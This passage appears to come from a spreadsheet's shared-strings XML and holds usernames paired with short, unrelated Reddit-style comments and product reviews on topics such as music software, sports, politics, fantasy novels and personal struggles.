    <t>GusSillyPants</t>
  </si>
  <si>
    <t>Hey all! I’ve been casually goofing with GarageBand for years now and I just nabbed a copy of Reaper to be able to produce dumb projects on my Surface Laptop on the go. I’d like to build up a big collection of a variety of free VSTi’s to get started. I’m not necessarily against paying for VSTi’s, but I’d love a library of free ones just to get familiar with the system and start making stuff. I don’t stick to any particular genre or style, since most of what I do is just for fun or for projects with family and friends. So what are your favorite free virtual instruments? Any and all suggestions are very valuable!</t>
  </si>
  <si>
    <t>fleentrain89</t>
  </si>
  <si>
    <t>&gt;Anyone else think these hashtags and name calling are starting to become an issue? I’m all for criticism when it’s due but stuff like this just seems immature and discredits valid criticism. You say this to people grieving the loss of 22 people, but not at all the name-calling our president does.</t>
  </si>
  <si>
    <t>Tobuscus. I loved his animations, his gameplay, his Literal Trailers, practically everything. And ever since the drama happened, I haven't watched him since. I just kinda fell out of it.</t>
  </si>
  <si>
    <t>DasBiceps</t>
  </si>
  <si>
    <t>the word "attack" is a bit strong here</t>
  </si>
  <si>
    <t>Scott</t>
  </si>
  <si>
    <t>I like the TV a lot, just what I was looking for. It is a good size for the room I put it in. It works pretty well with the Cox remote control.</t>
  </si>
  <si>
    <t>70ms</t>
  </si>
  <si>
    <t>Holy shit, no it's not a smart decision. I had a kid at 18 and two more at 30/32. The difference in how I felt physically when pregnant was marked despite only a 12/14 year difference. I'll be 49 next month and the thought of pregnancy is terrifying, even though my health is excellent and I'm fairly fit. Fuck that. Fuck that. Ladies at almost 50 should be enjoying kids who can mostly care for themselves and are going to fledge soon. They shouldn't be trying for records.</t>
  </si>
  <si>
    <t>Jekeb</t>
  </si>
  <si>
    <t>This or try for Aisling double veil :D</t>
  </si>
  <si>
    <t>frostyjohnson5</t>
  </si>
  <si>
    <t>Decided not to! I am gonna do two 250mg lines ten minutes apart though. I did that last night and I was okay.</t>
  </si>
  <si>
    <t>awks-orcs</t>
  </si>
  <si>
    <t>A throne?! Luxury!! My dad had to sit in a patch of nettles and wear a nettle crown.</t>
  </si>
  <si>
    <t>alfredneumann</t>
  </si>
  <si>
    <t>roger that...thx</t>
  </si>
  <si>
    <t>dhisboss_yt</t>
  </si>
  <si>
    <t>My Friends call Xbox gaybox</t>
  </si>
  <si>
    <t>Bebeours</t>
  </si>
  <si>
    <t>This should be on r/oddlyterrifying</t>
  </si>
  <si>
    <t>Allison</t>
  </si>
  <si>
    <t>Fits Perfectly. ?? so happy I got it and Pura Vida always has a good cause!</t>
  </si>
  <si>
    <t>SnakeInLeafsPajamas</t>
  </si>
  <si>
    <t>Options basically are: A. File a complaint with the police. B. Contact a lawyer. C. Let it go. You could do A &amp; B, or even A then C (which would be my choice). Realistically - the value in a phone is largely what's *on* the phone. Unless your friend is a douche, I doubt the police are just hiding it somewhere and it is in fact, lost, so really it's just a matter of damages. For most people, their phone has a current value of a few hundred dollars. You would probably spend that on the first meeting with a lawyer.</t>
  </si>
  <si>
    <t>ma70jake</t>
  </si>
  <si>
    <t>Fuckin' a, rick</t>
  </si>
  <si>
    <t>Sephiroso</t>
  </si>
  <si>
    <t>Presumably the daughter would not want to end up having to marry some old rich guy to live a luxurious lifestyle. So if she studies, she can work hard and earn that lifestyle herself.</t>
  </si>
  <si>
    <t>Raja_MBZ</t>
  </si>
  <si>
    <t>Bithumb: The total number of accusations: 2 The number of major accusations: 1 List: 2. Bithumb top one scam market. 1. Account closed by Bithumb and $400 DASH lost. Note: Both the accusations were posted back in 2017; not a single accusation has been posted in 2018 and 2019.</t>
  </si>
  <si>
    <t>vulkanspecter</t>
  </si>
  <si>
    <t>Competition is super fierce in China. Most flagships sell for under $500.</t>
  </si>
  <si>
    <t>When I play arty and there is one of those bugs missing from the map, I drop shells into common camping bushes to force it out. I have Vanguard and I know what those bugs can do if they are not killed early in the battle.</t>
  </si>
  <si>
    <t>RagerUriah</t>
  </si>
  <si>
    <t>I feel terrible for him man. He was so fun to watch even with a pretty terrible supporting cast most of his short-lived career. Not only was he fun to watch, he’s a great person. It’s so sad to see him (essentially) forced to retire. Honestly, I hope he has a fantastic career outside of being on the field, whether he’s a coach, broadcaster, or chooses an entirely different path. I send all my best wishes to Luck and his family. And let’s not forget about how awesome a dude T.Y. is either. He deserves a ring, him and Luck. Both of them are still some of my favourite players regardless. Love them and wish them the best (also how tf T.Y. put up with the Colts all these years lol)!</t>
  </si>
  <si>
    <t>SuckerNumber2YT</t>
  </si>
  <si>
    <t>Okay, rape is bad, but murder is worse. The consequences of losing a life is far beyond any other crime. If someone robbed you, sure he did something illegal, doesn’t give you the right to do something illegal too. They are BOTH on the wrong bow cause they both broke the law. Simple as that. He would’ve gotten punished either way. It’s. Not our job to take the law into our hands. If we want to, then we can before police officers, or judges. But unless we are in the jury, we don’t have the right to deceive someone else’s fate. If we turn this story backwards and say she killed him so he raped her daughter in return, it’s really bad, why? Because two wrongs don’t make a right. Not saying he doesn’t deserve punishment. But what she did was illegal. And no matter what your reason is, if it’s illegal, it’s illegal.</t>
  </si>
  <si>
    <t>NewWorldSapiens</t>
  </si>
  <si>
    <t>Wake up Bed Water Running Food Shower Teeth</t>
  </si>
  <si>
    <t>Stannisfaction</t>
  </si>
  <si>
    <t>It's definitely the Greyjoys (a nose ahead of the Martells -- partly due to Benioff/Weiss butchery, as the Dorne plot is fascinating and relevant to the overall story but feels insignificant in light of the adaption). Whether people dislike the setting or mood of the Iron Islands or simply reject the code of conduct of its natives uphold, it seems many consider them a backwater sideshow without any merit or interest (though some find that appealing nevertheless). I see a lot of love for Euron, who flagrantly disregards the customs and religion of his homeland (alongside any other cultures or faiths he encounters) and not so much for Aeron Damphair or Dagmer Cleftjaw, et al. Most Ironborn are dismissed or forgotten as a result of skimming (the exceptions are Asha Greyjoy, who is a badass, and Rodrik the Reader, who is my favourite Ironborn character). The other Ironborn appear to be considered a nuisance whose names clutter the page, which is a tragic mistake! The Hoares and Greyjoys fill several dozen pages of the history of Westeros, and their unique culture means they produce daunting warriors and worldly men who understand Westeros and Essos alike. The tradition of Salt Wives is fairly revolting, however, they are a a nation who adhere to strange and brutal traditions, as strictly as the North follows theirs, and they are sufficiently positioned and provisioned to explore and terrorise the world. Their influence on history is likely undocumented (aside from *coup d'états* such as the conquest of the Riverlands) The Ironborn are crucial to the plot (Balon representing the old guard and the fierce individualism which led the Ironborn to defy the newly crowned Robert Baratheon, and Euron representing the boons and curses of a newfound scion of a land that batters and absorbs other cultures, augmenting his inborn abilities with exotic drugs and arcane practises). No matter how events play out, the way they unfold will be a result of the invasions and machinations of the Iron Islanders. If Euron smashes the Reach, fAegon will have a direct path to the capital (unmolested by the Tyrells), provided the One-Eyed Kraken leaves him alone, and if Victarion fails and dies flailing his molten arm in Meereen, Daenerys will acquire the necessary ships to sail to Westeros and seize her birthright. I despair for Daenerys if she ever meets Euron in person. She is smart in her own right and a seeker of vague dreams and ambitions, but if he is presented with an opportunity to corrupt her Euron will make silhouettes of her painted visions.</t>
  </si>
  <si>
    <t>DuoCultellus</t>
  </si>
  <si>
    <t>I see you STULL replying to comments on this thread, &amp; get this video remains up. You’re a self-indulgent &amp; dangerous person. Don’t put someone on blast &amp; then show a video of how to drive up to their house. Take this garbage down.</t>
  </si>
  <si>
    <t>hollow100</t>
  </si>
  <si>
    <t>A knife that is smaller than my wee wee ~Death 13, the Shit-Eater</t>
  </si>
  <si>
    <t>aphrasheen</t>
  </si>
  <si>
    <t>Man, I need therapy just from the empathy I have for this post.</t>
  </si>
  <si>
    <t>wcalvert</t>
  </si>
  <si>
    <t>JFC 100 guests for a rehearsal dinner.... At that point, you're probably better off renting an event space and having catering. You could do what one of my friends did for their wedding, rent out Nouveau Antique Art bar (really affordable and open bar) and have El Tiempo cater.</t>
  </si>
  <si>
    <t>exPlodeyDiarrhoea</t>
  </si>
  <si>
    <t>&gt;Clauvino da Silva, also known as "Shorty," was found out when he displayed nervousness while trying to leave the penitentiary in the western part of Rio de Janeiro. If only he played it cool, he would've gotten away with it.</t>
  </si>
  <si>
    <t>Scruff_farmer</t>
  </si>
  <si>
    <t>They didnt torch witches they were hanged...sir. Joan of arc was french and burned for heresy. Witch hunt indeed.</t>
  </si>
  <si>
    <t>Warrior1354</t>
  </si>
  <si>
    <t>Stock and Stock Components:</t>
  </si>
  <si>
    <t>Laedyba</t>
  </si>
  <si>
    <t>interesting. thanks for the input!</t>
  </si>
  <si>
    <t>jennimew</t>
  </si>
  <si>
    <t>very good quality. My husband likes it a lot. Only one thing is that is not able to be folded smaller</t>
  </si>
  <si>
    <t>airwaves-</t>
  </si>
  <si>
    <t>Oh god, that got me in the guts</t>
  </si>
  <si>
    <t>SmallNewt</t>
  </si>
  <si>
    <t>Hello to the people reading this. Just recently had the best time of my life at this school for a year and now I'm out. The fact I could be with so many people 24/7 removed all of my inside problems. The biggest one being my dad move country half a year ago and it's been hard for me to deal with that. I instantly felt this emptiness of a feeling the first week of returning home and it's been with me ever since and I'm pretty sure its turning into a depression. Nobody could hold me under their wing anymore and worst of all I'm actually realising my dad is never coming back to me. Life is not great at the moment and its slowly affecting my long distance relationship. I told him I would take a break to focus more on myself but I am questioning how I can do that. What little things can help me get through the process of healing. I know time heals all wounds and this takes patience but do trust me when I say I have no clue where or how to begin. Do you just go by living life like you used to? Side note: I am seeing a therapist and will get in contact as soon as the summer holiday ends which is in a few days for me. But for anyone with a few tips I would appreciate it so much. I want to get back to him as soon as I can :))</t>
  </si>
  <si>
    <t>kluchgts</t>
  </si>
  <si>
    <t>Body lotion/moisturizer recommendations for someone with eczema, dry skin, and oily skin</t>
  </si>
  <si>
    <t>sircat31415</t>
  </si>
  <si>
    <t>i mean cmon even if you never learned geography in a class you should have found out by the time you’re an adult where those are.</t>
  </si>
  <si>
    <t>Slewey19</t>
  </si>
  <si>
    <t>Break it down backwards. 10% of 37 is 3.7 then 3x0.37 is like 1.11 (3x3=9 plus 3x.7=2.1 adds up to 11.1) so, 3.7 plus 1.11 is 4.81. After reading this back I can now understand why I’m no longer a maths teacher as there were many complaints about me teaching my “short cuts” rather than accepted calculation methods. Some kids “got it”, many did not...</t>
  </si>
  <si>
    <t>the-pak-man</t>
  </si>
  <si>
    <t>It’s too hot to be down there by that little dirty creek</t>
  </si>
  <si>
    <t>diveboydive</t>
  </si>
  <si>
    <t>That’s what you get for voting for turkeys</t>
  </si>
  <si>
    <t>Longtalljosie</t>
  </si>
  <si>
    <t>Your DH absolutely can talk to them about what they say when he’s out of the room - that’s an utter cop-out from him. Sadly overbearing parents and gutless adult children are part of a pair...</t>
  </si>
  <si>
    <t>helsinkirocks</t>
  </si>
  <si>
    <t>Fantastic opener to their best album.</t>
  </si>
  <si>
    <t>congressbot</t>
  </si>
  <si>
    <t>Introduced: Sponsor: Sen. Marsha Blackburn [R-TN] This bill was referred to the Senate Committee on Health, Education, Labor, and Pensions which will consider it before sending it to the Senate floor for consideration. [Govtrack.us Summary](https://www.govtrack.us/congress/bills/116/s2408?utm_campaign=govtrack_feed&amp;utm_source=govtrack/feed&amp;utm_medium=rss)</t>
  </si>
  <si>
    <t>L00se_Canon</t>
  </si>
  <si>
    <t>Does theology of the body have much to say about pederasty, while we're at it?</t>
  </si>
  <si>
    <t>hououin_kyouma_ooI</t>
  </si>
  <si>
    <t>So what about people who just pull there ethernet cable out or close the game down it's not going to stop it. Besides what if you have a gd reason to</t>
  </si>
  <si>
    <t>Buttscratch69</t>
  </si>
  <si>
    <t>https://mobile.twitter.com/Anna_Giaritelli/status/1157746862268530689</t>
  </si>
  <si>
    <t>Oregonguy1954</t>
  </si>
  <si>
    <t>Presidential Political campaign buttons. The pinback button was invented in the 1890's. I have at least one from every major party candidate starting with the first ones made in 1896. I started because I was interested in history and presidential politics, so it was a natural match for me. My best button is a Truman and Barkley button from 1948. Buttons that show the faces of both the presidential and vice-presidential candidates are called "jugates." Truman jugates are not easy to find, so they get a bit of a premium. Among the most expensive of political buttons out there are the ones from the Democratic candidates of 1920, Cox and Roosevelt. In any kind of condition at all they are worth thousands. I don't have one with both faces, but believe me when I go to garage sales I'm always looking. To see what one looks like, put "Cox Roosevelt jugate" into your search engine.</t>
  </si>
  <si>
    <t>HomeBoyVlogs</t>
  </si>
  <si>
    <t>Local milfs in my area</t>
  </si>
  <si>
    <t>tncouple1990</t>
  </si>
  <si>
    <t>Rubocop said: ↑ Love to compare and trash talk. Rubocop99 on kik Click to expand... We’ve chatted but never Skyped let’s do it some time</t>
  </si>
  <si>
    <t>Space-Jawa</t>
  </si>
  <si>
    <t>And the result was about the same as the last time Russia got uppity and the US had to do something about it.</t>
  </si>
  <si>
    <t>pay019</t>
  </si>
  <si>
    <t>We don't actually know the legal drinking age in the universe. Aiz is 16 and there's a backstory of her drinking. Lily is 15 and Bell is 14 so both might be able to drink. Did Bell and Lily get drinks in the bar where they met Apollo familia the first time?</t>
  </si>
  <si>
    <t>&gt;tfw want to read some dank S&amp;S or Heroic Fantasy set in the Stone Age and there isn't any</t>
  </si>
  <si>
    <t>guinnessman_19700000</t>
  </si>
  <si>
    <t>Maid is missing the towel to clean up</t>
  </si>
  <si>
    <t>mrtn17</t>
  </si>
  <si>
    <t>I suspect it was gravity again. Gravity can be a real bitch</t>
  </si>
  <si>
    <t>Please read this before trading: - Never reply to comments unless they have commented on your thread first. - **Always check the [ban_list](https://www.reddit.com/r/hardwareswapuk/wiki/ban_list) to make sure the person you are trading with isn't on there.** Make sure the user commments on your post to ensure they are not banned also. Once you have completed a trade you can get a rep page at /u/HWSUKrep, this then allows you to get a userflair. - When the item has sold, please comment "[Sold]" or "[Bought]" in the comments to automatically mark your post as such. - Always pay via **PayPal Goods and services** and **NEVER** with **PayPal Gift** or **Bank Transfer** unless you trust the user. --- **Please join the /r/HardwareSwapUK Discord server for deals, trading, tech discussion and support, buying advice, game channels, and more! 500+ users! - https://discord.gg/He2WvgU** --- Original Post: **Title:** [[BG] Lian Li O11 or Meshify [H] PayPal](/r/HardwareSwapUK/comments/cqmwl0/bg_lian_li_o11_or_meshify_h_paypal/) **Username:** /u/Akh1112 **Original Post:** Preferably good condition *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/HardwareSwapUK) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>juuuunel</t>
  </si>
  <si>
    <t>u mean another hero that the King of Fighters Chou will Eat?</t>
  </si>
  <si>
    <t>insanemember1990</t>
  </si>
  <si>
    <t>Currently on Blue buffalo adult large breed blend. He does get some grasses and general interaction with plant life and trees when outside. That's extremely helpful! Thanks so much!!</t>
  </si>
  <si>
    <t>comicholdinghand</t>
  </si>
  <si>
    <t>Also woah holy shit Jake H. Conception has got to be the best sax player in the world</t>
  </si>
  <si>
    <t>BloodyLlama</t>
  </si>
  <si>
    <t>I would disagree on the incest isekai, but dumbells is great.</t>
  </si>
  <si>
    <t>fucuntwat</t>
  </si>
  <si>
    <t>I turned the game on and saw his one big run, then he just got stonewalled on his next like 3 carries. it was rough</t>
  </si>
  <si>
    <t>rich519</t>
  </si>
  <si>
    <t>Only top level comments count though. It doesn't even take a poll or anything either. All that matters is the highest upvoted top level comment.</t>
  </si>
  <si>
    <t>Sarniarama</t>
  </si>
  <si>
    <t>Both awesome rolls, I couldn't shard either. I'd use 1 in Crucible though. Quickdraw will save you often. The ability to shoot them with a primary then switch and shotty them from outside normal OHK range is priceless.</t>
  </si>
  <si>
    <t>Fentron3000</t>
  </si>
  <si>
    <t>Who would have thought that there would be people enjoying themselves on a holiday Monday, the nerve. It’s just like when people go to Banff or Lake Louise on a long weekend and they can’t believe that everyone else had the same idea.</t>
  </si>
  <si>
    <t>CowNchicken12</t>
  </si>
  <si>
    <t>I only have Fraser and I'm dissapointed. Imagine tripling up on their attack...</t>
  </si>
  <si>
    <t>sonofaresiii</t>
  </si>
  <si>
    <t>I know you're just explaining, not necessarily advocating but what the hell is the point of making them so damn thin when you have to put it in a case just to get it to survive the trip home? I know people say "But if it were thicker, you'd just need an even thicker case!" Eh. I've owned two flagship tablets, both in cases, and they both tanked anyway. I've owned one super cheap tablet, the kindle fire, and as much as it's clearly shitty, super cheap hardware-- that thing is about an inch thick and it is built like a *tank*. I've never needed a case for it and it's outlived both my other flagship devices. I'll never understand why being super thin became such a huge trend, *especially* at the cost of useful features.</t>
  </si>
  <si>
    <t>ur-mum_</t>
  </si>
  <si>
    <t>no she wasn’t. the medical documents were released and there was no trace of a pregnancy</t>
  </si>
  <si>
    <t>kobmug</t>
  </si>
  <si>
    <t>You don't know anything about how the Lakers will play this year</t>
  </si>
  <si>
    <t>757jsmith</t>
  </si>
  <si>
    <t>The support person down the hall, they breathe... ugh</t>
  </si>
  <si>
    <t>tralphaz43</t>
  </si>
  <si>
    <t>Would be funny but they didn't cover the real directions</t>
  </si>
  <si>
    <t>gprime</t>
  </si>
  <si>
    <t>I don't disagree per se, but it is worth pointing out that some countries do not have life in prison as a sentence because they regard it as categorically excessive and cruel.</t>
  </si>
  <si>
    <t>aptly_named</t>
  </si>
  <si>
    <t>Been into the shoegaze scene for a long time. It's always helped some feeling part of a community.</t>
  </si>
  <si>
    <t>Autumns_Wraith</t>
  </si>
  <si>
    <t>Soon they will find salvation again, I have hope for em</t>
  </si>
  <si>
    <t>JanesKettle</t>
  </si>
  <si>
    <t>OP, my first thought when I read the title of your thread was 'FUCK OFF', so I am glad to see the many reiterations of this thought in your post. I've had more than one abortion anyway, and so far as I know, none of the 'fathers' gave a single shit. The only people who should be involved in an abortion are a woman (natal, of whatever gender expression) and her health care provider. Friends of mine had a late term termination of a severely disabled baby, and the dad was, of course, terribly upset, although acknowledging his experience was completely different to that of his partner, who was the person who was pregnant. He would not be opining that in the vast majority of terminations (before 16 weeks) fathers feelings matter in any practical way, because he's a decent guy. I mean, sure, go to counselling if you need to process your male sadness. That's fine. But accept your feelings are pretty much a side issue when it comes to abortion itself.</t>
  </si>
  <si>
    <t>JaCrispyInDaClink</t>
  </si>
  <si>
    <t>They haven’t hit 69 (nice) this month though.</t>
  </si>
  <si>
    <t>Weeeky</t>
  </si>
  <si>
    <t>Not directly related, but my Galaxy S9 for some reason has a problem where if i rotate the screen in any app, it has a random chance to cut the screen in half, like one half will be the app, and the other one'd be just my wallpaper with nothing else. Posting here because i'm either the only one in the world with this problem or others say ''nvm fixed it'' with no explanation like some fuckers. The problem is really fucking annoying, i don't know when it started happening, but it's been some time</t>
  </si>
  <si>
    <t>Legit_a_Mint</t>
  </si>
  <si>
    <t>&gt;Just on the off chance you're uninformed about 20th century history here's a good overview of the group LOL! I live in Madison and I know Karl Armstrong quite well - I did the legal work for the purchase of his short-lived sandwich shop, so I've heard all those old hippies drone on and on about what heroes they were for committing their acts of terrorism. But that's irrelevant, because they weren't disgruntled students or employees attacking their schools or workplaces, they were terrorists with a political agenda. That has absolutely nothing to do with the recent phenomenon of workplace and school shootings, or most other mass shootings in general, which you claim replaced the prior phenomenon of school and workplace bombings (which is, of course, total nonsense).</t>
  </si>
  <si>
    <t>Neoncow</t>
  </si>
  <si>
    <t>Every Republican Senator needs to be asked why they don't stop him. There are 53 Republican senators. It only takes 4 to stop his agenda. Every Republican Senator is complicit.</t>
  </si>
  <si>
    <t>onionon</t>
  </si>
  <si>
    <t>Great list! Let's just make sure to keep the games coming.</t>
  </si>
  <si>
    <t>Kafelek</t>
  </si>
  <si>
    <t>Are they inferior to 36 pack booster boxes in some way?</t>
  </si>
  <si>
    <t>halfhedge</t>
  </si>
  <si>
    <t>Great write-up!</t>
  </si>
  <si>
    <t>Clyde Copeland</t>
  </si>
  <si>
    <t>Whats everyones favorite John Wayne film? I always thought he should have won the Oscar for The Searchers (my favorite) or any of the John Ford directed stuff. Their relationship was one of the best actor/director work to come out of Hollywood.</t>
  </si>
  <si>
    <t>weasel85</t>
  </si>
  <si>
    <t>Similar thing happened a few months back at a game store near me. My friend was the manager there and had to throw a guy out of a Magic tournament/game/thing. He is apparently one of those jackass guys that goes beyond overbearing when he's winning. He was playing against a 13 year old girl who just started. He beat her, then berated her the rest of the night and kept telling her to go back to her barbies. She doesn't come around much anymore, which is a shame because the jackass got banned for life.</t>
  </si>
  <si>
    <t>mynu</t>
  </si>
  <si>
    <t>So, 4 is countless? Lol jk.</t>
  </si>
  <si>
    <t>Eloraell</t>
  </si>
  <si>
    <t>Nakadashi: And what about people that want to reserve names? You’ll have two weeks to change your server. Block out 3 servers with your preferred name, then you can add alternates to whichever doesn’t have streamers.</t>
  </si>
  <si>
    <t>Xagzan</t>
  </si>
  <si>
    <t>No people, let's be smart and bring it OFF</t>
  </si>
  <si>
    <t>yourinlove</t>
  </si>
  <si>
    <t>Do you know where to find the second video? I've been looking for it for a while cause it's hilarious</t>
  </si>
  <si>
    <t>Seb Rupik</t>
  </si>
  <si>
    <t>Hi there, the -E stands for 'Network Essentials' It will run IOS-XE. The model specified comes with four fixed 1G SFP ports, your module will work. https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-9200-series-switches/nb-06-cat9200-ser-data-sheet-cte-en.html cheers, Seb.</t>
  </si>
  <si>
    <t>ottomarly</t>
  </si>
  <si>
    <t>This is literally a textbook way of going about things lol</t>
  </si>
  <si>
    <t>Blazphemy</t>
  </si>
  <si>
    <t>Don't go swinging wildly then? Wait to start an attack AFTER the behemoth does his attack then? Use the cells that increase your dodge i-frames then? Attack after you dodge through an attack to put you in a good position and give more time then? I use the slowest weapon (hammer) and still have ample time to get combos in once I learned all their attacks. You're not gonna win by just spamming attacks either. It's a lot of cases of one or two hits, dodge through an attack, if put in a good position a full combo ensues.</t>
  </si>
  <si>
    <t>TheWiseDog</t>
  </si>
  <si>
    <t>They won't as those are the hours that are needed.</t>
  </si>
  <si>
    <t>chookatee2019</t>
  </si>
  <si>
    <t>They probably do the cutest damn things together too. Looks like this pic was taken in the middle of a solid coloring book session.</t>
  </si>
  <si>
    <t>jojo69</t>
  </si>
  <si>
    <t>Congratulations Mic, well earned...and welcome !</t>
  </si>
  <si>
    <t>GiantPurplePeopleEat</t>
  </si>
  <si>
    <t>I have a friend that was in a bunch of commercials when he was a kid and 20 years later he's still getting checks in the mail. Granted, some of them are for 45 cents, but all together he says he gets about $1000-1500 a month.</t>
  </si>
  <si>
    <t>FizzyBunch</t>
  </si>
  <si>
    <t>Lol suppressors are still regulated. Bumpstocks are banned. NJ is just getting worse and worse.</t>
  </si>
  <si>
    <t>CrimsonWolfSage</t>
  </si>
  <si>
    <t>Very carefully</t>
  </si>
  <si>
    <t>TheHoodedSomalian</t>
  </si>
  <si>
    <t>As weird as that sounds, I think it might work.</t>
  </si>
  <si>
    <t>anabellesks</t>
  </si>
  <si>
    <t>This is supposed to be a barn. What should I do? I already know I need to change the top window but it looks bad. Tips?</t>
  </si>
  <si>
    <t>polkcat</t>
  </si>
  <si>
    <t>I think he is just talking about PJ's feet.</t>
  </si>
  <si>
    <t>Tarlcabot18</t>
  </si>
  <si>
    <t>The fuck was that?!</t>
  </si>
  <si>
    <t>ernietruth9292</t>
  </si>
  <si>
    <t>I respectfully disagree, hunt could be an RB1 down the stretch it’s worth having the cuff the price won’t be too high</t>
  </si>
  <si>
    <t>Mx_Toniy_4869</t>
  </si>
  <si>
    <t>And Pokémon with Pixilite like Mega Gardevoir oh wait....</t>
  </si>
  <si>
    <t>Techgeek</t>
  </si>
  <si>
    <t>Very easy to setup. Has all functions needed for basic usage. Great item for the price.</t>
  </si>
  <si>
    <t>NoGood_Stinkin_ITGuy</t>
  </si>
  <si>
    <t>pffft 80 hours after release I already had 320 hours logged. I was playing on 4 different laptops at once. Level up Gamers.</t>
  </si>
  <si>
    <t>Mr_Vulcanator</t>
  </si>
  <si>
    <t>Why are all the images deleted?</t>
  </si>
  <si>
    <t>dakuclips</t>
  </si>
  <si>
    <t>Going to be in London from the 29th of September till the 4th of September, does anyone know of any bass events going on? cheers.</t>
  </si>
  <si>
    <t>Csanch52</t>
  </si>
  <si>
    <t>I’m sorry your going through this I can just imagine how hard it is on you to not get a break. My cousin is in a similar situation. Her husband is stationed in Virginia so she’s living there with their 2 year old daughter. They have no family near and he works 12 hours a day overnight so she’s stuck at home with her baby as well. I’m constantly FaceTiming with her so maybe that will help you to distract yourself a bit. Online shop maybe as well treating yourself to a new outfit. Try some face masks when the baby is sleeping paint your nails or just try to get out of the house and go to walk in the park with baby. Things like that so you can distract yourself. Remember only you can give your baby a happy mommy. ❤️</t>
  </si>
  <si>
    <t>Erlandal</t>
  </si>
  <si>
    <t>I didn't know taxes were in fact free.</t>
  </si>
  <si>
    <t>Alqpzmyv</t>
  </si>
  <si>
    <t>Ever been to the stadium in europe?</t>
  </si>
  <si>
    <t>-DISNEY-</t>
  </si>
  <si>
    <t>The socks?</t>
  </si>
  <si>
    <t>Soplox</t>
  </si>
  <si>
    <t>Thanks Also the Deal at BestBuy of the Base game + Starlink Starter Pack for $30 is still going</t>
  </si>
  <si>
    <t>NerdOnline3</t>
  </si>
  <si>
    <t>I mean which commoners wouldn't be willing to marry the cool adventurers</t>
  </si>
  <si>
    <t>Scottolan</t>
  </si>
  <si>
    <t>Let me just say that there is almost 0 tax revenue coming from that area, almost 100% are on welfare, 2/3+ of the homes are abandoned and there are very few families that actually still live there. Most of the population are the elderly who can’t afford to leave. They shut down the school because of poor attendance and poor performance, but there were still 3-4 very angry families who wanted millions spent so their kids didn’t have to ride a bus..</t>
  </si>
  <si>
    <t>Roushfan5</t>
  </si>
  <si>
    <t>No, the Portland Police Have no issues dealing with Antifa. It’s Patriot Prayer they take it easy on.</t>
  </si>
  <si>
    <t>GloomyCorgi17</t>
  </si>
  <si>
    <t>Can't wait for the release day, when we'll figure they fucked up all the gameplay</t>
  </si>
  <si>
    <t>thatanonamouse</t>
  </si>
  <si>
    <t>NTA You paid for your share, you deserve to enjoy it. She made the decision to break up, so she has to live with the consequences.</t>
  </si>
  <si>
    <t>Can-Leon</t>
  </si>
  <si>
    <t>Selfies. They were fun first, but know people just make too much of them...</t>
  </si>
  <si>
    <t>Background_Trash</t>
  </si>
  <si>
    <t>Where do you find this</t>
  </si>
  <si>
    <t>Tballz9</t>
  </si>
  <si>
    <t>I have a 9mm carbine (which would be an SBR under the US laws) for this purpose.</t>
  </si>
  <si>
    <t>you mean I can do it? It won't even start or gears wont shift</t>
  </si>
  <si>
    <t>findblocks.com</t>
  </si>
  <si>
    <t>Quote: from: Timewap on August 02, 2019, 05:11:34 AM UPDATE: Encocoin applied to four exchanges and have just received updates from one of the four which is Finebox exchange. Updates are still awaited from Crex24 and Livecoin. Would be updating you guys as more progress are made. According to available information, to start with, the following pairs shall be enabled enabled on Finebox - XNK/BTC and XNK/ETH Finebox website link : www.finebox.com thats great news</t>
  </si>
  <si>
    <t>Nanak</t>
  </si>
  <si>
    <t>Excerpt: Reasonable price and works great. Battery last longer compare to other brands.</t>
  </si>
  <si>
    <t>tornadoRadar</t>
  </si>
  <si>
    <t>Odd cause trump was on those flights too. Weird how that works. donald trump is in office thanks to the russians. its clearly laid out the mueller report. surely you've read it and now just taken the fox news talking points?</t>
  </si>
  <si>
    <t>_chan</t>
  </si>
  <si>
    <t>I think you really need to get less irritated by your friends' buddy choice.</t>
  </si>
  <si>
    <t>node202fighter</t>
  </si>
  <si>
    <t>&gt; China out of reach of CCP, they want normal laws without CCP telling them what to do and without fear of being cut off one day when CCP wakes up in a bad mood So in other word criminals should commit murder and what not in mainland China and be free in Hong Kong? What "wake up in a bad mood" are you referring to in the bill?</t>
  </si>
  <si>
    <t>lifeisvhard</t>
  </si>
  <si>
    <t>Trying with all my might to make it through M2 with severe anxiety, but I'm not so sure I'll be able to make it through M3...I can pass exams, which is all I really need to do to pass preclinical years, but whenever I'm asked to explain something to an attending or do basically anything hands on, I become a performance anxiety-ridden, bumbling, shaky mess. I am trying to get it under control before clinicals starts so that I don't have to take a LoA, but it's been challenging (and extremely expensive because my school doesn't provide very good mental health resources). If I make it through M2 and Step, can I at least have the peace of mind that those will be permanently under my belt/I won't have to repeat anything due to a gap because preclinicals and clinicals?</t>
  </si>
  <si>
    <t>damonstea</t>
  </si>
  <si>
    <t>Thanks for the detailed critique! I really like brush calligraphy which is why I went with the ridiculous font - it's unfortunate that the many 'o's in 'Wormwood' make brush font look awful for the main title. Maybe it would be easier to grasp if the side of the box had a clearer, novel like title font.</t>
  </si>
  <si>
    <t>tpodr</t>
  </si>
  <si>
    <t>Pretty much how I do</t>
  </si>
  <si>
    <t>Your title is too short, please resubmit your post with a different title. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/dankmemes) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>chochazel</t>
  </si>
  <si>
    <t>Sorry your fave pet factoid got knocked down! Not everything you read on the internet is true!</t>
  </si>
  <si>
    <t>justin283</t>
  </si>
  <si>
    <t>I knew you were trolling, but a bit of advice, trolling needs some relation to the truth to be funny. Otherwise it's just cringey, unless you are pandering to an uncurious braindead audience.</t>
  </si>
  <si>
    <t>ChangingViews09</t>
  </si>
  <si>
    <t>&gt; As per the attack ads, I'm looking forward to see what kind of slander the Liberal Party spins, as the Conservative Party attacks weren't particularly that (in)direct (Just Not Ready is definitely not as extreme as Scheer/Bernier Support the KKK, hate gays, are going to take away abortion), they were short and to the point, but the Liberal Party messages I've been hearing in the last few months about, abortion or gay marriage or white supremacy, all seem to be non-issues in Canada as our laws are well established above how they are in the US, and they keep getting brought up in the media because the government keeps making them issues. Welcome to the Liberal Party of Canada. They've always claimed to take the high road and then turned around to make ludicrous attack ads. Remember when Stephen Harper said that he'd try to fix retention in the military by moving bases closer to major cities rather that in the middle of nowhere? Well, [this ad perfectly displayed the LPC's fear mongering and ludicrous accusations.](https://www.youtube.com/watch?v=unNZtCH9Mdo) &gt; when in reality, the Right parties just want to work together. It should be noted that this is 